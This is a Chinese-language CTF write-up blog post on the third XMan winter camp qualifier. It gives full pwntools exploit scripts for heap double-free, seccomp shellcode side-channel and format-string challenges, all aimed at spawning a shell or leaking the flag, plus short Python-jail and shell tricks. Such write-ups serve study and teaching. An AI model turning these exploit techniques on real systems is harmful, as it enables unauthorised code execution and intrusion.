第三届XMan冬令营选拔赛 - Writeup

@t3ls  December 23, 2019
tags: ctf write-up

第三届XMan冬令营选拔赛 - Writeup

Pwn

baby_arm

arm的doublefree,魔改的libc还不给,也是佛了

from pwn import *
import sys
context.update(arch='arm', endian='little', log_level='debug')

if sys.argv[1] == "r":
    p = remote('127.0.0.1',14242)
elif sys.argv[1] == "l":
    p = process(["qemu-arm-static", "-L", "/usr/arm-linux-gnueabihf", "./babyarm"])
else:
    p = process(["qemu-arm-static", "-g", "1234", "-L", "/usr/arm-linux-gnueabihf", "./babyarm"])
    sleep(1)

e = ELF('./babyarm')
l = ELF('/usr/arm-linux-gnueabihf/lib/libc.so.6')

def add(size, data):
    p.sendlineafter('choice:', '1')
    p.sendlineafter('size :',str(size))
    p.sendafter('Content :', str(data))


def delete(idx):
    p.sendlineafter('choice:', '2')
    p.sendlineafter('Index :', str(idx))


def show(idx):
    p.sendlineafter('choice:', '3')
    p.sendlineafter('Index :', str(idx))


def edit(idx, data):
    p.sendlineafter('choice:', '5')
    p.sendlineafter('Index :',str(idx))
    p.sendafter('content:', str(data))


if __name__ == '__main__':
    for i in range(-0xa0, 0xa0, 0x10):
        try:
            p.sendlineafter('your name:', p32(0x19)*8)
            add(0x40, '\n')
            add(0x10, '\n')
            delete(0)
            show(0)
            l.address = u32(p.recv(4)) - (0xf67b67cc - 0xf66ce000)
            p.recv(4)
            print(hex(l.address))
            # pause()
            edit(0, p32(0)+p32(0x21088-0x8))#p32(e.got['atoi'] - 0x8)*2)
            add(0x40, '\n')
            add(0x10, p32(e.got['atoi']))
            edit(0, p32(l.symbols['system']+i))
            p.sendlineafter('choice:', 'sh')
            p.sendline('ls')
            p.recvline()
            p.recvline(timeout=0.5)
            p.interactive()
        except Exception:
            p.close()
            p = remote('127.0.0.1',14242)

NoooCall

通过seccomp禁掉了系统调用,因此采用cmp + loop的方法判断是否为正确字节,是则循环loop锁死,否则执行jne跳过loop命令

from pwn import *
context.update(arch='amd64')#, log_level='debug')

#p = process('chall')
#gdb.attach(p)
#pause()
p = remote('121.36.64.245',10003)

if __name__ == '__main__':
    flag = []
    for j in range(32):
        for i in range(0xff):
            try:
                sc = asm('''
                    mov rbx,[rsp+0x18]
                    mov al,[rbx+{0}]
                    cmp al,{1}
                    '''.format(hex(j),hex(i)))
                sc += '\x75\x02'
                #sc += asm('''
                #    inc rcx
                #    ''')
                sc += '\xe2\xfe'
                p.sendafter('Shellcode >>', sc)
                sleep(0.1)
                p.sendline('aaaaaaaaaaaaaaaaaa')
                p.recvline(timeout=0.5)
                #pause()
                p.close()
                #p = process('chall')
                p = remote('121.36.64.245',10003)
                print('[+]chr {}:{}'.format(j,chr(i)))
                flag.append(chr(i))
                break
            except EOFError:
                print('[-]chr {}:{}'.format(j,chr(i)))
                p.close()
                p = remote('121.36.64.245',10003)
                #p = process('chall')
    print(''.join(flag))

format

堆上的格式化字符串,通过rbp链修改返回地址为system("/bin/sh"),需要爆破一下最低位字节的高4位bit

from pwn import *
context.update(arch='i386',log_level='debug')

#p = process('./format', aslr=False)
#gdb.attach(p,'''
#    b *0x8048606
#    c
#    ''')
#pause()
shell = 0x80485ab

p = remote('119.3.172.70', 10005)
#payload = '%18$p|'
payload = ''
payload += '%{}c%10$hhn|'.format(0x4c)
payload += '%{}c%18$hn|'.format(0x85ab)
payload += '%{}c%10$hhn|'.format(0x4c+2)
payload += '%{}c%18$hn|~~'.format(0x804)
while 1:
    try:
        p.sendlineafter('...', payload)
        #pause()
        sleep(0.1)
        p.recvuntil('~~')
        p.sendline('ls')
        p.recvline()
        p.recvline()
        p.interactive()
        break
    except Exception:
        p.close()
        #p = process('./format',aslr=False)
        p = remote('119.3.172.70', 10005)

Misc

ezzpython

正则匹配不完整,可输入数字

from pwn import *
context.update(arch='amd64')

payload = ''
for i in list('[email protected]#'):
    payload += "\'%c\'%{}+".format(bin(ord(i)))

print(payload)

最终payload

'%c'%0b1100110+'%c'%0b1101100+'%c'%0b1100001+'%c'%0b1100111+'%c'%0b111111+'%c'%0b100001+'%c'%0b1000000+'%c'%0b100011

ShellMaster

输入$0获取当前shell,再用base64读取flag


添加新评论